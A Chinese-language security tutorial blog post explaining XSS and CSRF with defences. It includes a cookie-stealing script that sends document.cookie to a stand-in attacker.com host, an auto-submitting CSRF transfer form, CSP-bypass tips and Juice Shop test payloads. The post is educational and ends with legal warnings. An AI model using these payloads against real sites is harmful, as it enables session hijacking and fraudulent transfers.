当前位置: 首页 > news >正文

【第七期】漏洞攻防-前端篇:XSS 与 CSRF —— 当浏览器成为攻击者的“肉鸡”

💡导读:如果说 SQL 注入是攻击服务器,那么XSS(跨站脚本)​ 和CSRF(跨站请求伪造)​ 则是攻击用户。在这个浏览器即操作系统的时代,前端漏洞的危害不容小觑。本期我们将揭秘:为什么你只是点开了一个链接,黑客就能盗走你的 Cookies,甚至用你的账号发帖、转账?


一、 XSS:让你的浏览器替我干活

XSS (Cross-Site Scripting)​ 的本质是:网站没有过滤用户输入,导致攻击者可以在网页中插入恶意 JavaScript 代码,而其他用户浏览时,代码会自动执行。

1. 三种主要形态

类型

存储型 (Stored)

反射型 (Reflected)

DOM 型 (DOM-based)

存储位置

服务器数据库

不在服务器存储

客户端 DOM

触发方式

用户访问含恶意代码的页面

用户点击含恶意参数的链接

前端 JS 处理逻辑不当

危害程度

⭐⭐⭐⭐⭐ (蠕虫级)

⭐⭐⭐ (钓鱼/盗号)

⭐⭐⭐⭐ (API 劫持)

例子

恶意评论<script>alert(1)</script>

搜索框?q=<script>...</script>

URL#<img src=x onerror=alert(1)>

2. 实战演练:盗取 Cookie(Session Hijacking)

这是 XSS 最经典的利用方式。

场景:某论坛存在存储型 XSS。

Payload(攻击载荷)

<script> // 1. 创建一个 Image 对象 var img = new Image(); // 2. 将当前页面的 Cookie 发送到攻击者的服务器 img.src = "http://attacker.com/log?" + document.cookie; </script>

攻击流程

  1. 攻击者将上述代码发布在论坛帖子或评论中。

  2. 受害者浏览该帖子,浏览器执行这段 JS。

  3. 受害者的PHPSESSID=abc123被发送到attacker.com

  4. 攻击者拿到abc123,在 Burp Suite 中替换自己的 Cookie。

  5. 结果:攻击者无需密码,直接登录受害者的账户。


二、 CSRF:借用你的“身份证”办事

CSRF (Cross-Site Request Forgery)​ 俗称“点猪”,意思是:利用用户已登录的身份,在用户不知情的情况下,伪造请求执行恶意操作。

1. 核心逻辑:浏览器自带“助攻”

当你登录bank.com后,浏览器会自动保存该域下的 Cookie。

此时,如果你访问了一个恶意网站evil.com,该网站中的代码试图向bank.com发起转账请求,浏览器会自动带上bank.com的 Cookie

服务器看到 Cookie 是对的,就以为是用户本人操作的。

2. 实战演练:自动转账

场景:某银行转账接口设计简陋。

正常转账请求

http

POST /transfer HTTP/1.1 Host: bank.com Cookie: session=logged_in_user amount=1000&to=hacker_account

攻击者的evil.html

<body onload="document.forms[0].submit()"> <form action="https://bank.com/transfer" method="POST"> <input type="hidden" name="amount" value="10000"> <input type="hidden" name="to" value="hacker_account"> </form> </body>

结果:只要用户登录了网银,且打开了evil.html,就会立刻静默转账 10000 元。


三、 2026 年前沿:绕过现代防御

现在的浏览器和框架都有防护,但黑客总有办法。

1. CSP (Content Security Policy) 绕过

CSP 是为了防止 XSS 执行。但如果配置不当:

  • script-src 'unsafe-inline':允许内联脚本,XSS 依然有效。

  • script-src https://cdn.com:如果cdn.com存在任意文件上传,可以引入恶意 JS。

2. 基于 DOM 的 CSRF

现代网站多用 API + Token(如 JWT)。如果 Token 存储在localStorage中,且前端 JS 自动将其添加到 Header 里,传统的 CSRF(靠 Cookie)会失效。

但是:如果网站存在XSS,攻击者可以直接读取localStorage['token'],然后用这个 Token 调用 API,实现“无 Cookie 接管”。


四、 实战:在 Juice Shop 中寻找 XSS

  1. 登录 Juice Shop。

  2. 找到“评论”功能或“搜索”框。

  3. 尝试输入最简单的 Payload:<script>alert('XSS')</script>

  4. 如果弹窗出现,说明存在 XSS。

  5. 进阶:尝试使用<img src=x onerror=alert(document.cookie)>来绕过一些简单的过滤。


五、 防御指南:如何修补?

1. 防 XSS
  • 输入过滤:对< > " '等特殊字符进行转义(HTML Entity)。

  • CSP 头:设置Content-Security-Policy: default-src 'self'; script-src 'self',禁止外链脚本。

  • HttpOnly:给 Cookie 加上HttpOnly属性,禁止 JavaScript 读取 Cookie(这是防 XSS 盗 Session 的大招)。

2. 防 CSRF
  • CSRF Token:服务器生成一个随机 Token 埋在表单里,每次请求必须携带,攻击者无法伪造。

  • SameSite Cookie:设置Set-Cookie: session=xyz; SameSite=Strict,禁止第三方网站发起请求时携带 Cookie。


⚠️ 安全警示与法律红线

请务必遵守以下准则:

  1. XSS 红线:利用 XSS 漏洞盗取他人 Cookie、挂马、蠕虫传播,属于非法获取计算机信息系统数据罪

  2. CSRF 红线:制作 CSRF POC(概念验证)测试时,仅限于无危害的 GET 请求(如刷新页面)。严禁构造转账、修改密码、发送邮件等高危 POC 在真实网站上测试。

  3. 隐私保护:在截图证明漏洞时,务必遮挡受害者的个人信息(头像、昵称、手机号)。

前端漏洞危害的是人,而非机器。作为安全研究者,请守住人性的底线,不要利用漏洞伤害真实用户。


💬 互动环节

  • 你见过最奇葩的 XSS 过滤机制是什么?(比如把script换成scr1pt?)

  • 你觉得在 SPA(单页应用)中,Token 放在 Cookie 里安全,还是 LocalStorage 里安全?

  • 欢迎在评论区留言讨论!

👉 下一期预告:【漏洞攻防-高危 RCE 篇】命令执行与 Log4j2 —— 为什么打印一条日志就能接管服务器?

http://www.jsqmd.com/news/1020292/

相关文章:

  • 5个步骤掌握低代码数据处理:Awesome-Dify-Workflow的AI辅助数据分析终极指南
  • 2026市场营销岗位学数据分析的技术价值
  • 嵌入式MCU芯片选择机制:从地址解码到中断响应的实战解析
  • 2026年6月《剑与翼》正版下载安装完整指南:三端适配调试与新手稳定开荒手册一、文章概述
  • ​6月16日晚上19:00直播丨Ascend C开源资料及样例分享
  • 微信海量聊天记录怎么存?聊聊后端流水的数据库分库分表与归档设计
  • 从固定周期到动态触发:超自动化巡检的智能调度
  • LSTM为何比RNN更适用于工业级时序建模
  • `pdfplumber` 是一个用于从 PDF 文件中提取文本、表格和元数据的 Python 库
  • 二次供水泵房多中心数据上报到企业、部门等平台的方案
  • 北京配眼镜去哪好?五种日常场景匹配五种镜片方案 - 配眼镜新资讯
  • 蓝牙产品:蓝牙信标 (BLE Beacon) 深度调研
  • 开短路测试(Open/Short Test)原理
  • 5个生产级Jupyter扩展构建可审计Notebook工作流
  • 2026年一键生成论文工具对比实测:5款神器从初稿到定稿全周期护航
  • 终极指南:如何在5分钟内完成MelonLoader Unity游戏Mod加载器安装
  • 广州配眼镜去哪好?避坑精简指南 - 配眼镜新资讯
  • 细胞核荧光定量分析:从Z-stack图像到可靠GFP强度值的Python全流程
  • 用目标传播训练硬激活神经网络:原理与PyTorch实操
  • Zotero Style插件:终极文献管理效率提升70%的完整指南
  • MSC711x定时器PWM与级联配置实战:从寄存器到波形生成
  • ESP-CSI实战指南:无线信道感知技术的完整应用方案
  • 开源工具完整解析:轻松实现Office订阅版功能解锁
  • JD-AssistantV2:如何通过自动化抢购工具在3分钟内提升京东秒杀成功率500%
  • 别再走弯路!2026亲测靠谱的AI写作辅助网站|实测避坑硬核版
  • 多分类评估指标手算指南:TP/FP/FN/TN与TPR/FPR逐类解析
  • 酒店预订数据的探索性分析实战:EDA与可视化深度指南
  • 你说的应该是‌exFAT注意簇的大小‌吧,簇大小(分配单元大小)是exFAT使用中需要重点权衡的参数,直接影响存储空间利用率和读写性能,核心结论和建议如下:
  • 贝叶斯缺失机制分析:从MNAR识别到Ignorability判断
  • 一周深度学习实战课:知识压缩与认知锚点教学法